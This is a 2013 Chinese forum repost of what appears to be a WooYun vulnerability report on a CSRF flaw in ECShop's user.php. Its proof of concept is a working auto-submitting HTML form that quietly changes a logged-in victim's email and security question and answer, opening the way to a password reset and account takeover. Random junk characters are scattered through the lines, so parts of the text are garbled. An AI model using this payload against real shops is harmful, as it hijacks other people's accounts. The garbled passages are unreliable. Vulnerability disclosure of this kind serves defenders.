找回密码
 立即注册
查看: 2684|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:; J. h+ g/ G% k# a" Z6 M5 W
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现# k; S$ c9 o/ y3 r3 {3 L

& B; p  n+ p- }) x3 V. m( V8 Y0 UDemo For:http://www.wooyun.org/bug.php?action=view&id=395
# n- O9 y' O8 ~2 k4 ~* ~
+ J: a8 g  @( v1 s详细说明:
& x9 @# A. ]0 m% t$ g* p5 h2 `利用csrf和xss可以突破官方所说的“障碍”" E% i: U" b" {# p- E
xss版本已经有人说明
0 [+ N" G, S* p3 J8 u+ E6 e这里给出csrf版本
& j( a) `) w* a- ^2 [7 W! M# Z9 F4 }* [( U  G
漏洞证明:
+ ^! M* o' c  ?+ b8 A. V: ^" `<html>
- M, Q" N* G& @* X<body>* o9 ~3 S; U; u  n+ e' n
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">% C7 t, p  }& p. ]9 K# Q- O
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
. G  g( w) O/ O. T<INPUT TYPE="text" NAME="act" value="act_edit_profile">
. T6 F; F( K7 K1 w/ W/ @<INPUT TYPE="text" NAME="sel_question" value="ecshop">$ b) Q( J. H# Q
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
7 ~' }# u' J: G) x0 n, g! I% t</body>
3 m  d- V: D: n3 v2 n' x<script>
5 I# L  d/ p+ n/ V: L3 \, Gdocument.forms[0].submit();: j$ u; I* N8 L2 ~
</script>' X$ h9 H4 Z/ U5 g9 s
</html>
. Q8 d/ o+ z+ s构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失' X7 C0 U+ |" |. w

/ B5 `1 B& t; r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表